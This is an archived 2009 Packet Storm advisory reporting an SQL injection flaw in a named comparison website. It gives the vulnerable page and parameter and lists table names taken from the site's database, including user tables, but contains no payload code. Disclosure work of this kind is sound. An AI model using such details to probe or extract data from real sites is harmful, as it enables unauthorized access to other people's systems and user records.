compareindia.in.com SQL Injection

2009-02-18T00:00:00
ID PACKETSTORM:75027
Type packetstorm
Reporter Jaydeep Dave
Modified 2009-02-18T00:00:00

Description

                                        
                                            `====================================================================  
Website: http://compareindia.in.com/  
  
Category: India's biggest hardware comparision website + buyer's guide  
  
Vulnerability: Inband SQL Injection  
  
Founder: Jaydeep Dave [jaydipdave@gmail.com]  
  
Date: 16th Feb, 2009  
====================================================================  
  
== P O C ===========================================================  
  
URL:  
http://compareindia.in.com/writeyourreview.php?prodid=3333  
  
  
Database: compareindia  
[124 tables]  
+-------------------+  
| expertanswer |  
| companymaster |  
| cmslog |  
| phpbb_users |  
| storerating |  
| boxmanagement |  
| dealemaster |  
| dealerupload |  
| pollresults |  
| productdetails |  
| users |  
| specorder |  
| ... |  
+-------------------+  
  
  
====================================================================  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`